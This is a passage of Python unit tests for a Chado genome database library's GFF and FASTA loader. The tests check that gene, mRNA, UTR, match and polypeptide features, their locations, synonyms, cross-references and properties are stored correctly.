    assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
    # Check pep loc
    assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
    assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
    children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
    assert len(children) == 30, "mRNA relationships, subfeatures"  # relations to utr/cds/exons are duplicated as they don't have an ID or Name attribute in gff => random uniquename in db
    cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
    exonterm = self.ci.get_cvterm_id('exon', 'sequence')
    utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
    utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
    subsub_f = None  # will hold one three_prime_UTR child, checked in detail below
    for c in children:
        assert children[c].type_id == partofterm, "subsubfeatures"
        if children[c].subject.type_id == utr3term:
            subsub_f = children[c].subject
        assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
    # Check a subsubfeature
    assert subsub_f is not None, "found a three_prime_UTR subsubfeature"
    assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
    assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
    assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
    assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
    assert subsub_f.residues is None, "gff>utr loaded correctly"
    assert subsub_f.seqlen is None, "gff>utr loaded correctly"
    assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
    assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
    assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
    assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
    assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
    # Check utr with 2 parents
    confused_child_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename='an_utr_with_two_parents') \
        .all()
    assert len(confused_child_f) == 1, "1 utr with 2 parents"
    confused_rels = confused_child_f[0].subject_in_relationships
    assert len(confused_rels) == 2, "1 utr with 2 parents"
    for r in confused_rels:
        assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
    # Check Derives_from
    derivesfrom = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename='some_special_cds') \
        .all()
    assert len(derivesfrom) == 1, "derives_from"
    derivesfrom_rels = derivesfrom[0].subject_in_relationships
    assert len(derivesfrom_rels) == 2, "derives_from"
    for r in derivesfrom_rels:
        assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
    terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
    assert len(terms) == 2, "gff>ontology_term loaded correctly"
    assert '000001' in terms, "gff>ontology_term loaded correctly"
    assert '00002' in terms, "gff>ontology_term loaded correctly"
    assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
    assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
    # Target location (the feature also has a second loc from the Target attribute)
    assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
    if derivesfrom[0].featureloc_collection[0].fmin == 120:
        checkedloc = 0
    else:
        checkedloc = 1
    assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
    assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
    assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
    assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>target loc ok"
def test_load_gff_landmarktype(self):
    """Load a fasta as plain contigs then a GFF: features must still be
    mapped onto the existing landmark without passing landmark_type."""
    org = self._create_fake_org()
    an = self._create_fake_an()
    an_gff = self._create_fake_an('gff')
    # there's a contig loaded by fasta and a supercontig in gff
    self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'])
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
    gene_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename="orange1.1g015632m.g") \
        .join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
        .one()
    geneterm = self.ci.get_cvterm_id('gene', 'sequence')
    # Check gene feature
    assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
    assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
    assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
    assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
    assert gene_f.residues is None, "gff>gene loaded correctly"
    assert gene_f.seqlen is None, "gff>gene loaded correctly"
    # md5 of the empty string: no sequence computed (no_seq_compute=True)
    assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
    assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
    assert gene_f.is_analysis is False, "gff>gene loaded correctly"
    assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
    # Check gene loc
    assert len(gene_f.featureloc_collection) == 1, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
def test_load_gff_nolandmark(self):
    """With no landmark in the db, load_gff must create one itself when a
    landmark_type is given, and map the GFF features onto it."""
    org = self._create_fake_org()
    an_gff = self._create_fake_an('gff')
    # Should create the landmark
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="contig", no_seq_compute=True)
    gene_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename="orange1.1g015632m.g") \
        .join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
        .one()
    geneterm = self.ci.get_cvterm_id('gene', 'sequence')
    # Check gene feature
    assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
    assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
    assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
    assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
    assert gene_f.residues is None, "gff>gene loaded correctly"
    assert gene_f.seqlen is None, "gff>gene loaded correctly"
    # md5 of the empty string: no sequence computed (no_seq_compute=True)
    assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
    assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
    assert gene_f.is_analysis is False, "gff>gene loaded correctly"
    assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
    # Check gene loc
    assert len(gene_f.featureloc_collection) == 1, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
@raises(Exception)
def test_load_gff_nolandmark_fail(self):
    """With no landmark in the db and no landmark_type, load_gff must fail.

    No assertions follow the load_gff call: any code after it would be
    unreachable when the loader raises, and a follow-up query raising
    NoResultFound would otherwise satisfy @raises(Exception) even if the
    loader regressed to not raising.
    """
    org = self._create_fake_org()
    an_gff = self._create_fake_an('gff')
    # No landmark exists and no landmark_type is given, so the loader has
    # nothing to map the GFF features onto => it should raise
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
def test_load_gff_match(self):
    """Load a matches GFF on top of an annotation and check that the match
    and match_part features, their locs, props and analysisfeature
    significance are stored correctly."""
    org = self._create_fake_org()
    an = self._create_fake_an()
    an_gff = self._create_fake_an('gff')
    an_match = self._create_fake_an('matches')
    self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'])
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
    self.ci.feature.load_gff(gff="./test-data/matches.gff", analysis_id=an_match['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
    # Check match
    match_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename="PAC:18136238-protein_XP_012228303.1_match_0001") \
        .one()
    matchterm = self.ci.get_cvterm_id('match', 'sequence')
    matchpartterm = self.ci.get_cvterm_id('match_part', 'sequence')
    assert match_f.dbxref_id is None, "gff>match loaded correctly"
    assert match_f.organism_id == org['organism_id'], "gff>match loaded correctly"
    assert match_f.name == "PAC:18136238-protein_XP_012228303.1_match_0001", "gff>match loaded correctly"
    assert match_f.uniquename == "PAC:18136238-protein_XP_012228303.1_match_0001", "gff>match loaded correctly"
    assert match_f.residues is None, "gff>match loaded correctly"
    assert match_f.seqlen is None, "gff>match loaded correctly"
    # md5 of the empty string: no sequence computed (no_seq_compute=True)
    assert match_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>match loaded correctly"
    assert match_f.type_id == matchterm, "gff>match loaded correctly"
    assert match_f.is_analysis is False, "gff>match loaded correctly"
    assert match_f.is_obsolete is False, "gff>match loaded correctly"
    # The match is located on the peptide it hits, not on a genomic landmark
    assert len(match_f.featureloc_collection) == 1, "gff>match loaded correctly"
    assert match_f.featureloc_collection[0].srcfeature.uniquename == 'PAC:18136238-protein', "gff>match loaded correctly"
    assert match_f.featureloc_collection[0].fmin == 50, "gff>match loaded correctly"
    assert match_f.featureloc_collection[0].fmax == 325, "gff>match loaded correctly"
    assert match_f.featureloc_collection[0].strand is None, "gff>match loaded correctly"
    assert match_f.featureloc_collection[0].phase == 0, "gff>match loaded correctly"
    # Check relationships
    assert len(match_f.object_in_relationships) == 1, "match_part relationship"
    partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
    assert match_f.object_in_relationships[0].type_id == partofterm, "match_part relationship"
    # Check match featureprop (each entry is cvterm___value___rank)
    expected = [
        'e-value___1e-27___0',
        'hit_description___PREDICTED: uncharacterized protein LOC105675603 [Linepithema humile]___0',
        'hit_name___XP_012228303.1___0'
    ]
    assert len(match_f.featureprop_collection) == 3, "gff>match loaded correctly"
    for prop in match_f.featureprop_collection:
        assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>match loaded correctly"
        expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
    match_part = match_f.object_in_relationships[0].subject
    assert match_part.dbxref_id is None, "gff>match loaded correctly"
    assert match_part.organism_id == org['organism_id'], "gff>match loaded correctly"
    assert match_part.name == "PAC:18136238-protein_XP_012228303.1_match_0001_1", "gff>match loaded correctly"
    assert match_part.uniquename == "PAC:18136238-protein_XP_012228303.1_match_0001_1", "gff>match loaded correctly"
    assert match_part.residues is None, "gff>match loaded correctly"
    assert match_part.seqlen is None, "gff>match loaded correctly"
    assert match_part.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>match loaded correctly"
    assert match_part.type_id == matchpartterm, "match_part"
    assert match_part.is_analysis is False, "gff>match loaded correctly"
    assert match_part.is_obsolete is False, "gff>match loaded correctly"
    assert len(match_part.featureloc_collection) == 1, "gff>match loaded correctly"
    assert match_part.featureloc_collection[0].srcfeature.uniquename == 'PAC:18136238-protein', "gff>match loaded correctly"
    assert match_part.featureloc_collection[0].fmin == 50, "gff>match loaded correctly"
    assert match_part.featureloc_collection[0].fmax == 325, "gff>match loaded correctly"
    assert match_part.featureloc_collection[0].strand is None, "gff>match loaded correctly"
    assert match_part.featureloc_collection[0].phase == 1, "gff>match loaded correctly"
    # Check match_part featureprop (the GFF Target attribute)
    expected = [
        'target___XP_012228303.1+21+302___0'
    ]
    assert len(match_part.featureprop_collection) == 1, "gff>match loaded correctly"
    for prop in match_part.featureprop_collection:
        assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>match loaded correctly"
        expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
    # Check analysisfeature (significance comes from the GFF score column)
    assert match_f.analysisfeature_collection[0].analysis_id == an_match['analysis_id'], "gff>match loaded correctly"
    assert match_f.analysisfeature_collection[0].significance == 303, "gff>match loaded correctly"
    assert match_part.analysisfeature_collection[0].analysis_id == an_match['analysis_id'], "gff>match loaded correctly"
    assert match_part.analysisfeature_collection[0].significance == 303, "gff>match loaded correctly"
def test_load_gff_withpepfasta(self):
    """Protein sequences given via the fasta argument of load_gff must be
    attached to the corresponding polypeptide features."""
    org = self._create_fake_org()
    an = self._create_fake_an()
    an_gff = self._create_fake_an('gff')
    self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'])
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/prots.fa")
    # The peptide sequence must come from the protein fasta file
    protein = self.ci.session.query(self.ci.model.feature).filter_by(uniquename="PAC:18136238-protein").one()
    assert protein.residues == "SGTRGVDFSVFDC", "gff>fasta seq loaded correctly"
    assert protein.seqlen == 13, "gff>fasta seq loaded correctly"
    assert protein.md5checksum == "744bbb7c3f619a479ea90b4e9f627bd1", "gff>fasta seq loaded correctly"
def test_load_gff_withlandmarkfasta(self):
    """When the landmark sequence is given via the fasta argument, the
    landmark gets that sequence and mRNA/peptide sequences are computed."""
    org = self._create_fake_org()
    an_gff = self._create_fake_an('gff')
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/genome.fa", landmark_type="supercontig")

    def fetch_one(uniquename):
        # Local helper: fetch a single feature by its uniquename
        return self.ci.session.query(self.ci.model.feature).filter_by(uniquename=uniquename).one()

    # The landmark sequence comes straight from the fasta file
    landmark = fetch_one("scaffold00001")
    assert landmark.residues.startswith("TTTTGTATTCTATGTCCTCTGATCTTT"), "gff>fasta seq loaded correctly"
    assert landmark.seqlen == 5927163, "gff>fasta seq loaded correctly"
    assert landmark.md5checksum == "80db0e5ccdc07e200c035d23c5951271", "gff>fasta seq loaded correctly"
    # The mRNA sequence is computed from the landmark
    mrna = fetch_one("PAC:18136238")
    assert mrna.residues.startswith("AAAGGAATTGAGTTTCATTAAGAATTTAAATAAAACAATGTCATAATCCGGGTATTTGGAATATT"), "gff>fasta seq loaded correctly"
    assert mrna.seqlen == 1212, "gff>fasta seq loaded correctly"
    assert mrna.md5checksum == "ad0d8a5031b63bacfe23296c80072550", "gff>fasta seq loaded correctly"
    # The peptide sequence is computed as well
    protein = fetch_one("PAC:18136238-protein")
    assert protein.residues.startswith("KGIEFH*EFK*NNVIIRVFGIFKLQPGLVVMQRPTR*QNDNLALVLGFRSFVHSFSS*AKANWNLTKCNAYTSSEPEQHSSYKXXXXXXXXXXXXXXXXXXXXXX"), "gff>fasta seq loaded correctly"
    assert protein.seqlen == 404, "gff>fasta seq loaded correctly"
    assert protein.md5checksum == "fbf522da5203405c620eb708afd3cc9f", "gff>fasta seq loaded correctly"
def test_load_gff_withlandmarkonly(self):
    """The gff creates a supercontig landmark and other features are mapped
    on it; with no fasta, no sequence gets computed for any feature."""
    org = self._create_fake_org()
    an_gff = self._create_fake_an('gff')
    # Here the gff will create a supercontig, and other features will be mapped on it.
    # No fasta => no computed seq
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="supercontig")
    empty_md5 = "d41d8cd98f00b204e9800998ecf8427e"  # md5 of the empty string
    # Landmark, mRNA and peptide must all be sequence-less
    for uniquename in ("scaffold00001", "PAC:18136238", "PAC:18136238-protein"):
        feat = self.ci.session.query(self.ci.model.feature).filter_by(uniquename=uniquename).one()
        assert feat.residues is None, "gff>fasta seq loaded correctly"
        assert feat.seqlen is None, "gff>fasta seq loaded correctly"
        assert feat.md5checksum == empty_md5, "gff>fasta seq loaded correctly"
@raises(Exception)
def test_load_gff_withoutlandmark(self):
    """Loading a GFF whose landmark is not in the db must raise."""
    fake_org = self._create_fake_org()
    gff_an = self._create_fake_an('gff')
    # The gff will create a supercontig, but the loader features will try to
    # map on a contig that does not exist => fail
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=gff_an['analysis_id'], organism_id=fake_org['organism_id'])
def test_load_gff_withwronglandmarkonly(self):
    """Load a GFF asking for a 'contig' landmark type.

    The loader creates both a supercontig and a contig landmark, maps the
    features on the contig, and — with no fasta — computes no sequence.
    """
    org = self._create_fake_org()
    an_gff = self._create_fake_an('gff')
    # Here the gff will create a supercontig and a contig, and other features will be mapped on contig.
    # No fasta => no computed seq
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="contig")
    contigterm = self.ci.get_cvterm_id('contig', 'sequence')
    # md5 of the empty string: the loader stored no residues at all.
    empty_md5 = "d41d8cd98f00b204e9800998ecf8427e"

    def _fetch(uname, type_id=None):
        # Fetch a single feature by uniquename, optionally narrowed by type.
        query = self.ci.session.query(self.ci.model.feature).filter_by(uniquename=uname)
        if type_id is not None:
            query = query.filter_by(type_id=type_id)
        return query.one()

    # Landmark (checked with its contig type), mRNA and polypeptide must
    # all be sequence-less.
    checked = (
        _fetch("scaffold00001", contigterm),
        _fetch("PAC:18136238"),
        _fetch("PAC:18136238-protein"),
    )
    for feat in checked:
        assert feat.residues is None, "gff>fasta seq loaded correctly"
        assert feat.seqlen is None, "gff>fasta seq loaded correctly"
        assert feat.md5checksum == empty_md5, "gff>fasta seq loaded correctly"
def test_load_gff_relranks(self):
    """Relationship ranks of the mRNA children must follow genomic order."""
    org = self._create_fake_org()
    an_gff = self._create_fake_an('gff')
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="contig")
    partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
    # Check mrna
    mrna_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename="PAC:18136238") \
        .one()
    # Collect (fmin, rank) for every part_of child of the mRNA.
    pairs = [
        (rel.subject.featureloc_collection[0].fmin, rel.rank)
        for rel in mrna_f.object_in_relationships
        if rel.type_id == partofterm
    ]
    # Sort by genomic position first, then re-sort that by rank: if ranks
    # follow the positions, the stable second sort is a no-op.
    by_position = sorted(pairs, key=lambda p: p[0])
    by_rank = sorted(by_position, key=lambda p: p[1])
    assert by_position == by_rank, "children sorted correctly"
def test_load_gff_addonly(self):
    """Load a GFF (+fasta, no seq compute) with add_only=True on an empty db.

    Verifies that features, locations, synonyms, dbxrefs, featureprops,
    parent/child relationships, multi-parent features, Derives_from links,
    ontology terms and Target locations are all created correctly.
    """
    org = self._create_fake_org()
    an_gff = self._create_fake_an('gff')
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/genome.fa", landmark_type="supercontig", no_seq_compute=True, add_only=True)
    # The joins guarantee the gene has at least one loc and one synonym.
    gene_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename="orange1.1g015632m.g") \
        .join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
        .one()
    geneterm = self.ci.get_cvterm_id('gene', 'sequence')
    # Check gene feature
    assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
    assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
    assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
    assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
    assert gene_f.residues is None, "gff>gene loaded correctly"
    assert gene_f.seqlen is None, "gff>gene loaded correctly"
    # md5 of the empty string: no residues were computed (no_seq_compute).
    assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
    assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
    assert gene_f.is_analysis is False, "gff>gene loaded correctly"
    assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
    # Check gene loc
    assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
    assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
    src_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
        .one()
    assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
    # Remember the landmark id: mRNA and pep must be located on it too.
    scaff1_id = src_f.feature_id
    # Check gene aliases
    exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
    syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
    assert len(syns) == 2, "gff>gene aliases loaded correctly"
    assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
    assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
    assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
    assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
    # Check gene dbxref
    dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
        .filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
    for db in dbs:
        if db.name == "FOOBAR":
            # FOOBAR did not pre-exist: the loader must have created it.
            assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
    dbs = {db.name: db.db_id for db in dbs}
    assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
    xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
    assert len(xrefs) == 3, "gff>gene dbxrefs loaded correctly"
    assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
    assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
    assert 'phytozome6' in xrefs, "gff>gene dbxrefs loaded correctly"
    assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
    assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
    assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>gene dbxrefs loaded correctly"
    # Check gene featureprop
    # Expected props encoded as name___value___rank; each must occur once.
    expected = [
        'Gap___BLABLA___0',
        'Gap___BLOBLO___1',
        'Note___that\'s fantastic___0',
        'Note___really___1',
        'Poutrelle___test___1',
        'Poutrelle___lapinou___0',
    ]
    assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
    for prop in gene_f.featureprop_collection:
        assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
        # Remove as we go so duplicates would be caught.
        expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
    # Check mrna
    rna_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename="PAC:18136219") \
        .join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
        .one()
    rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
    # Check mRNA feature
    assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
    assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
    assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
    assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
    assert rna_f.residues is None, "gff>mRNA loaded correctly"
    assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
    assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
    assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
    assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
    assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
    # Check mRNA loc
    assert len(rna_f.featureloc_collection) == 1, "gff>pep located correctly"
    assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
    assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
    # Check mRNA aliases
    exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
    syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
    assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
    assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
    assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
    assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
    assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
    # Check mRNA dbxref
    xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
    assert len(xrefs) == 3, "gff>mRNA dbxrefs loaded correctly"
    assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
